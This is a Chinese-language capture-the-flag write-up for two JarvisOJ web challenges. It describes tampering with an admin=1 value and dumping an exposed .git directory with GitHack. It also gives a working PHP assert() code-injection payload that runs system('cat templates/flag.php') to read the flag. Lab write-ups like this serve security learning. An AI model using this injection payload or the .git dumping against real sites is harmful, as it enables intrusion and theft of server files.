61dctf writeup

**

admin

**

打开页面发现。。。。就一个Hello World= =，查看源代码也无果，那么抓个包吧= =

emmmm，发现什么也没有，那么就robots.txt看看吧，发现果然有东西
web.jarvisoj.com:32792/robots.txt

访问这个后发现。。。。flag{hello guest}。。。。嗯。。。被骗了，提交这个没有用
那么在这个页面抓个包，再改一次admin= 1即可

**

babyphp

**
查看源码，发现有个hint耶。。。。看来是page传参

<!--<li ><a href="?page=flag">My secrets</a></li> -->

根据提示，有个git，于是想到了.git漏洞
参考博客 http://www.freebuf.com/sectool/66096.html

于是可以导出源码

python GitHack.py web.jarvisoj.com:32798/.git

可以找到index.php中的源代码

<?phpif (isset($_GET['page'])) {    $page = $_GET['page'];} else {    $page = "home";}$file = "templates/" . $page . ".php";assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");assert("file_exists('$file')") or die("That file doesn't exist!");?>

看来是个绕过。。。。
构造payload

','..')===False and system('cat templates/flag.php');//

于是就变成了

assert("strpos('"templates/" . ','..')===False and system('cat templates/flag.php');// . ".php"', '..') === false")

把前面的strpos函数给闭合了，调用系统命令查看template目录下的flag.php，再把后面注释掉
flag就出来了，美滋滋啊~~~